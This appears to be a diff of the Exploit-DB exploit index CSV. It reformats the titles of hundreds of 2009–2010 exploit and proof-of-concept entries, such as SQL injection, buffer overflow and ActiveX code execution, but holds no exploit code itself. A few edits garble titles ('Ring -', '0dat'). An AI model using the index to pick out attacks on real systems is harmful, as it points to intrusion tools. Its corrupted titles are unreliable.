10759,platforms/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Stack BOF",2009-12-28,corelanc0d3r,windows,local,0 -10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0 +10760,platforms/php/webapps/10760.txt,"Joomla Component com_calendario Blind SQL Injection Vulnerability",2009-12-28,Mr.tro0oqy,php,webapps,0 10762,platforms/php/webapps/10762.txt,"Sunbyte e-Flower SQL Injection Vulneralbility",2009-12-28,"Don Tukulesto",php,webapps,0 10763,platforms/php/webapps/10763.txt,"Dren's PHP Uploader Remote File Upload Vulnerability",2009-12-28,"Cyb3r IntRue",php,webapps,0 10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - SEH (0day)",2009-12-29,Lincoln,windows,remote,6660 @@ -9986,7 +9986,7 @@ id,file,description,date,author,platform,type,port 10789,platforms/php/webapps/10789.txt,"Joomla compnent com_noticia cross site scripting",2009-12-29,Mr.tro0oqy,php,webapps,0 10790,platforms/php/webapps/10790.txt,"Joomla Component com_kkcontent Blind SQL Injection Vulnerability",2009-12-29,Pyske,php,webapps,0 10791,platforms/windows/remote/10791.py,"Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x",2009-12-30,emgent,windows,remote,80 -10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS multiple vulnerability",2009-12-30,emgent,hardware,webapps,80 +10792,platforms/hardware/webapps/10792.txt,"My Book World Edition NAS Multiple Vulnerability",2009-12-30,emgent,hardware,webapps,80 10793,platforms/php/webapps/10793.txt,"RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion",2009-12-30,"cr4wl3r ",php,webapps,0 10794,platforms/asp/webapps/10794.txt,"WEB Calendar Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 10795,platforms/asp/webapps/10795.txt,"ezguestbook Remote Database Disclosure Vulnerability",2009-12-30,RENO,asp,webapps,0 @@ -10023,14 +10023,14 @@ id,file,description,date,author,platform,type,port 10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 php (Auth Bypass) SQL Injection Vulnerabilit",2009-12-30,"Hussin X",php,webapps,0 10833,platforms/php/webapps/10833.txt,"Classifieds Script (type) Remote SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 10834,platforms/php/webapps/10834.txt,"Link Trader (lnkid) Remote SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 -10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 +10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 10836,platforms/php/webapps/10836.txt,"elkagroup (pid) Remote SQL Injection Vulnerability",2009-12-30,"Hussin X",php,webapps,0 10837,platforms/php/webapps/10837.txt,"Quick Poll (code.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 (.asx) - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 10841,platforms/php/webapps/10841.pl,"pL-PHP <= beta 0.9 - Local File Include Exploit",2009-12-31,"cr4wl3r ",php,webapps,0 -10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) overflow DoS Exploit (0day)",2009-12-31,mr_me,windows,dos,0 +10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) Overflow DoS Exploit (0day)",2009-12-31,mr_me,windows,dos,0 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0 10845,platforms/php/webapps/10845.txt,"fileNice php file browser RFI and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 10846,platforms/php/webapps/10846.txt,"Weatimages Directory Traversal and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 @@ -10067,7 +10067,7 @@ id,file,description,date,author,platform,type,port 10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local crash PoC",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 Cross Site Scripting Vulnerability",2010-01-02,Sora,php,webapps,0 -10911,platforms/windows/remote/10911.py,"NetTransport Download Manager version:2.90.510 0day",2010-01-02,Lincoln,windows,remote,0 +10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 (0day)",2010-01-02,Lincoln,windows,remote,0 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script Cookie Handling Vulnerability",2010-01-02,DigitALL,php,webapps,0 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 ""New Year Edition"" - .m3u Exploit (0day)",2010-01-02,"fl0 fl0w",windows,dos,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic ",php,webapps,0 @@ -10089,7 +10089,7 @@ id,file,description,date,author,platform,type,port 10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone persistent XSS DoS",2010-01-03,marco_,hardware,dos,0 10948,platforms/php/webapps/10948.txt,"Joomla Component com_abbrev Local File Inclusion Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10949,platforms/php/webapps/10949.txt,"Joomla Component com_countries SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 -10950,platforms/php/webapps/10950.txt,"Joomla Component com_tpjobs Blind SQL injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 +10950,platforms/php/webapps/10950.txt,"Joomla Component com_tpjobs Blind SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10952,platforms/php/webapps/10952.txt,"Joomla Component com_alfresco SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10953,platforms/php/webapps/10953.txt,"Joomla Component com_hotbrackets Blind SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10955,platforms/asp/webapps/10955.txt,"MasterWeb Script <= 1.0 - (details&newsID) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,asp,webapps,0 @@ -10112,7 +10112,7 @@ id,file,description,date,author,platform,type,port 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads 1.0 - Remote File Upload Vulnerability",2010-01-04,kaMtiEz,php,webapps,0 -10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 Arabic Version - File Inclusion Vulnerability",2010-01-04,indoushka,php,webapps,0 +10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 (Arabic Version) - File Inclusion Vulnerability",2010-01-04,indoushka,php,webapps,0 10988,platforms/php/webapps/10988.txt,"Joomla Component com_j-projects Blind SQL Injection Vulnerability",2010-01-04,Pyske,php,webapps,0 10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps,0 10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps,0 @@ -10131,7 +10131,7 @@ id,file,description,date,author,platform,type,port 11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload Vulnerability",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"[GOM Audio Local crash PoC]",2010-01-06,applicationlayer,windows,dos,0 -11021,platforms/windows/dos/11021.txt,"Flashget 3.x IEHelper Remote Exec 0day PoC",2010-01-06,superli,windows,dos,0 +11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec PoC (0day)",2010-01-06,superli,windows,dos,0 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 (Post Auth) Remote BOF Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT Database Disclosure Vulnerability",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery SQL Injection Vulnerability",2010-01-06,FL0RiX,php,webapps,0 @@ -10140,7 +10140,7 @@ id,file,description,date,author,platform,type,port 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 RTSP BOF (Perl)",2010-01-06,jacky,windows,remote,0 11028,platforms/php/webapps/11028.txt,"Docebo 3.6.0.2 (stable) Local File Inclusion",2010-01-06,"Zer0 Thunder",php,webapps,0 11029,platforms/multiple/local/11029.txt,"DirectAdmin <= 1.33.6 Symlink Permission Bypass",2010-01-06,alnjm33,multiple,local,0 -11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 XSS Vulnerability",2010-01-06,POPCORN,hardware,webapps,0 +11030,platforms/hardware/webapps/11030.txt,"D-LINK DKVM-IP8 - XSS Vulnerability",2010-01-06,POPCORN,hardware,webapps,0 11031,platforms/php/webapps/11031.txt,"Milonic News (viewnews) SQL Injection Vulnerability",2010-01-06,Err0R,php,webapps,0 11033,platforms/php/webapps/11033.txt,"Joomla Component com_kk Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) BOF PoC",2010-01-06,s4squatch,windows,dos,0 @@ -10154,15 +10154,15 @@ id,file,description,date,author,platform,type,port 11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability",2010-01-07,Sora,php,webapps,0 11051,platforms/php/webapps/11051.txt,"AutoIndex PHP Script (index.php) Directory Traversal Vulnerability",2010-01-07,Red-D3v1L,php,webapps,0 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service PoC",2010-01-07,anonymous,windows,dos,0 -11053,platforms/windows/dos/11053.py,"ttplayer=5.6Beta3 Dos PoC",2010-01-07,"t-bag YDteam",windows,dos,0 +11053,platforms/windows/dos/11053.py,"ttplayer=5.6Beta3 DoS PoC",2010-01-07,"t-bag YDteam",windows,dos,0 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Shell Upload Vulnerability",2010-01-07,Yozgat.Us,php,webapps,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 -11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 Multiple Permanent XSS (0day)",2010-01-07,emgent,php,webapps,80 +11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 - Multiple Permanent XSS (0day)",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability",2010-01-07,"Hussin X",php,webapps,0 -11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 +11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec PoC (0dat)",2010-01-08,superli,windows,dos,0 11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 (print_view) Blind SQL Injection Vulnerability",2010-01-08,Red-D3v1L,php,webapps,0 -11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 -11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 +11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX - Remote Exec PoC (0day)",2010-01-08,superli,windows,dos,0 +11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec PoC (0day)",2010-01-08,superli,windows,dos,0 11068,platforms/php/webapps/11068.txt,"Joomla Component com_ksadvertiser SQL Injection Vulnerability",2010-01-08,FL0RiX,php,webapps,0 11069,platforms/php/webapps/11069.txt,"DELTAScripts PHPLinks (catid) SQL Injection Vulnerability",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11070,platforms/windows/dos/11070.txt,"Windows Live Messenger 2009 ActiveX DoS Vulnerability",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0 @@ -10182,7 +10182,7 @@ id,file,description,date,author,platform,type,port 11089,platforms/php/webapps/11089.txt,"Joomla Component com_jvideodirect Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11090,platforms/php/webapps/11090.txt,"Joomla Component com_jashowcase Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal BOF-SEH (META)",2010-01-10,fb1h2s,windows,local,0 -11094,platforms/php/webapps/11094.txt,"Simply Classified 0.2 XSS & CSRF Vulnerabilities",2010-01-10,mr_me,php,webapps,0 +11094,platforms/php/webapps/11094.txt,"Simply Classified 0.2 - XSS & CSRF Vulnerabilities",2010-01-10,mr_me,php,webapps,0 11095,platforms/windows/dos/11095.txt,"YPOPS! 0.9.7.3 - Buffer Overflow (SEH)",2010-01-10,blake,windows,dos,0 11096,platforms/asp/webapps/11096.txt,"ABB 1.1 - Forum Remote Database Disclosure Vulnerability",2010-01-10,"ViRuSMaN ",asp,webapps,0 11097,platforms/asp/webapps/11097.txt,"Egreetings 1.0 b - Remote Database Disclosure Vulnerability",2010-01-10,"ViRuSMaN ",asp,webapps,0 @@ -10194,25 +10194,25 @@ id,file,description,date,author,platform,type,port 11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 (sql/xss) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 (PLS File) Stack Overflow (meta)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload Vulnerability",2010-01-11,R3d-D3V!L,php,webapps,0 -11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion vulnerability",2010-01-11,kaMtiEz,php,webapps,0 -11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit",2010-01-11,"fl0 fl0w",windows,local,0 +11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion Vulnerability",2010-01-11,kaMtiEz,php,webapps,0 +11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 local .html Buffer Overflow (win32) Exploit",2010-01-11,"fl0 fl0w",windows,local,0 11113,platforms/php/webapps/11113.txt,"tincan ltd (section) SQL Injection Vulnerability",2010-01-11,"ALTBTA ",php,webapps,0 11116,platforms/php/webapps/11116.html,"Alwjeez Script Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 -11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote 0day DoS Exploit",2010-01-12,mr_me,ios,dos,8080 +11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote DoS Exploit (0day)",2010-01-12,mr_me,ios,dos,8080 11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 (SQL/XSS) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 -11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 Multiple XSS Vulnerabilities",2010-01-13,h00die,php,webapps,0 +11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple XSS Vulnerabilities",2010-01-13,h00die,php,webapps,0 11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow DoS PoC",2010-01-13,"Julien Bedard",hardware,dos,2121 -11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection vulnerability",2010-01-13,SiLeNtp0is0n,php,webapps,80 +11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection Vulnerability",2010-01-13,SiLeNtp0is0n,php,webapps,80 11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 - CSRF",2010-01-13,The.Morpheus,php,webapps,80 11130,platforms/windows/dos/11130.pl,"Ofilter Player (skin.ini) Local Crash PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 -11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 Remote DoS",2010-01-13,corelanc0d3r,windows,dos,0 +11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote DoS",2010-01-13,corelanc0d3r,windows,dos,0 11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability",2010-01-13,"Rehan Ahmed",windows,dos,0 11133,platforms/windows/dos/11133.pl,"NPlayer (.dat Skin File) Local Heap Overflow PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - DB Download Vulnerability",2010-01-13,indoushka,asp,webapps,0 11135,platforms/php/webapps/11135.txt,"PSI CMS 0.3.1 - SQL Injection",2010-01-13,"learn3r hacker",php,webapps,0 11136,platforms/php/webapps/11136.txt,"Public Media Manager SQLi vulns",2010-01-13,"learn3r hacker",php,webapps,0 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 -11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 .ini local stack buffer overflow PoC",2010-01-14,"fl0 fl0w",windows,local,0 +11139,platforms/windows/local/11139.c,"Winamp 5.05-5.13 .ini local Stack Buffer Overflow PoC",2010-01-14,"fl0 fl0w",windows,local,0 11140,platforms/php/webapps/11140.txt,"Joomla Component com_articlemanager SQL Injection Vulnerability",2010-01-14,FL0RiX,php,webapps,0 11141,platforms/php/webapps/11141.txt,"dokuwiki 2009-12-25 - Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps,0 11142,platforms/multiple/dos/11142.txt,"Multiple Media Player - HTTP DataHandler Overflow (Itunes, Quicktime, etc)",2010-01-15,Dr_IDE,multiple,dos,0 @@ -10228,7 +10228,7 @@ id,file,description,date,author,platform,type,port 11155,platforms/php/webapps/11155.txt,"Transload Script Upload Vulnerability",2010-01-16,DigitALL,php,webapps,0 11156,platforms/php/webapps/11156.txt,"PHP-RESIDENCE <= 0.7.2 - Multiple LFI Vulnerability",2010-01-16,"cr4wl3r ",php,webapps,0 11157,platforms/php/webapps/11157.txt,"MoME CMS <= 0.8.5 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 -11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 +11158,platforms/php/webapps/11158.txt,"RoseOnlineCMS <= 3 B1 - Remote Login Bypass Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11159,platforms/php/webapps/11159.txt,"DasForum (layout) Local File Inclusion Exploit",2010-01-16,"cr4wl3r ",php,webapps,0 11161,platforms/windows/local/11161.pl,"Rosoft Media Player 4.4.4 Buffer OverFlow Exploit (SEH)",2010-01-16,Red-D3v1L,windows,local,0 11162,platforms/php/webapps/11162.txt,"CLONEBID B2B Marketplace Multiple Vulnerabilities",2010-01-16,"Hamza 'MizoZ' N.",php,webapps,0 @@ -10241,9 +10241,9 @@ id,file,description,date,author,platform,type,port 11169,platforms/php/webapps/11169.txt,"Max's Image Uploader Shell Upload Vulnerability",2010-01-17,indoushka,php,webapps,0 11171,platforms/windows/local/11171.pl,"Audiotran 1.4.1 - Direct RET BoF",2010-01-17,jacky,windows,local,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,remote,0 -11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX Remote Exec 0day PoC",2010-01-17,superli,windows,remote,0 -11174,platforms/windows/local/11174.c,"VLC 0.8.6 [b][c][d][a] - (.ASS file) buffer overflow exploit(win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 -11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer <= 5.9.14.1246 ActiveX Remote Exec 0day PoC",2010-01-17,superli,windows,dos,0 +11173,platforms/windows/remote/11173.txt,"TrendMicro Web-Deployment ActiveX - Remote Exec PoC (0day)",2010-01-17,superli,windows,remote,0 +11174,platforms/windows/local/11174.c,"VLC 0.8.6 [b][c][d][a] - (.ASS file) Buffer Overflow Exploit(win32 universal)",2010-01-17,"fl0 fl0w",windows,local,0 +11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer <= 5.9.14.1246 - ActiveX Remote Exec PoC (0day)",2010-01-17,superli,windows,dos,0 11177,platforms/php/webapps/11177.txt,"Joomla Component com_prime Directory Traversal",2010-01-17,FL0RiX,php,webapps,0 11178,platforms/php/webapps/11178.txt,"Joomla Component com_libros SQL Injection Vulnerability",2010-01-17,FL0RiX,php,webapps,0 11179,platforms/windows/remote/11179.rb,"Exploit EFS Software Easy Chat Server 2.2",2010-01-18,"John Babio",windows,remote,0 @@ -10263,33 +10263,33 @@ id,file,description,date,author,platform,type,port 11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0 11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0 11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0 -11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring 0 Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0 +11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring - Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0 11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BOF (SEH)",2010-01-19,jacky,windows,local,0 11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0 -11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0 +11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u File) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,"cr4wl3r ",windows,local,0 11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic (.asx) - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat server Universal BOF-SEH (Meta)",2010-01-21,fb1h2s,windows,remote,0 11211,platforms/multiple/webapps/11211.txt,"cPanel HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0 -11213,platforms/php/webapps/11213.txt,"Joomla Component com_book SQL injection Vulnerability",2010-01-21,Evil-Cod3r,php,webapps,0 +11213,platforms/php/webapps/11213.txt,"Joomla Component com_book SQL Injection Vulnerability",2010-01-21,Evil-Cod3r,php,webapps,0 11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server <= 1.9.8/win32 - CSRF Vulnerability",2010-01-21,"cp77fk4r ",windows,webapps,0 -11216,platforms/php/webapps/11216.txt,"Blog System 1.x (note) SQL Injection Vuln",2010-01-21,"BorN To K!LL",php,webapps,0 +11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection Vuln",2010-01-21,"BorN To K!LL",php,webapps,0 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow PoC",2010-01-21,SkuLL-HackeR,windows,dos,0 11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0 11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 11222,platforms/php/webapps/11222.txt,"Joomla Component com_gameserver SQL Injection Vulnerability",2010-01-22,B-HUNT3|2,php,webapps,0 -11223,platforms/php/webapps/11223.txt,"Joomla (com_avosbillets) SQL injection Vulnerability",2010-01-22,snakespc,php,webapps,0 +11223,platforms/php/webapps/11223.txt,"Joomla (com_avosbillets) SQL Injection Vulnerability",2010-01-22,snakespc,php,webapps,0 11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - (SQLi/XSS/CSRF) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic ",php,webapps,0 -11225,platforms/php/webapps/11225.txt,"Joomla Component com_gurujibook SQL injection Vulnerability",2010-01-22,snakespc,php,webapps,0 -11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies SQL injection Vulnerability",2010-01-22,snakespc,php,webapps,0 +11225,platforms/php/webapps/11225.txt,"Joomla Component com_gurujibook SQL Injection Vulnerability",2010-01-22,snakespc,php,webapps,0 +11226,platforms/php/webapps/11226.txt,"Joomla Component com_biographies SQL Injection Vulnerability",2010-01-22,snakespc,php,webapps,0 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 (.mp3) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 11229,platforms/windows/local/11229.txt,"Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution (add admin user)",2010-01-22,Stack,windows,local,0 -11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit",2010-01-22,mu-b,windows,local,0 +11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0 11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection Vulnerability",2010-01-23,alnjm33,php,webapps,0 @@ -10311,7 +10311,7 @@ id,file,description,date,author,platform,type,port 11258,platforms/php/webapps/11258.html,"Status2k Remote Add Admin Exploit",2010-01-25,alnjm33,php,webapps,0 11260,platforms/windows/dos/11260.txt,"AIC Audio Player 1.4.1.587 Local Crash PoC",2010-01-26,b0telh0,windows,dos,0 11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0 -11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back exploit",2010-01-26,"Nikola Petrov",php,webapps,0 +11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0 11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec remote files",2010-01-26,"Nikoal Petrov",php,webapps,0 11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0 11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0 @@ -10332,7 +10332,7 @@ id,file,description,date,author,platform,type,port 11284,platforms/php/webapps/11284.txt,"PHP Product Catalog CSRF Change Administrator Password",2010-01-29,bi0,php,webapps,0 11286,platforms/php/webapps/11286.txt,"Joomla JReservation Blind SQL Injection Vulnerability",2010-01-29,B-HUNT3|2,php,webapps,0 11287,platforms/php/webapps/11287.txt,"Joomla Component JE Quiz Blind SQL Injection Vulnerability",2010-01-29,B-HUNT3|2,php,webapps,0 -11288,platforms/multiple/dos/11288.py,"Wireshark 1.2.5 LWRES getaddrbyname stack BOF",2010-01-29,babi,multiple,dos,0 +11288,platforms/multiple/dos/11288.py,"Wireshark 1.2.5 LWRES getaddrbyname Stack BOF",2010-01-29,babi,multiple,dos,0 11289,platforms/php/webapps/11289.txt,"Joomla Component com_dms 2.5.1 - SQL Injection 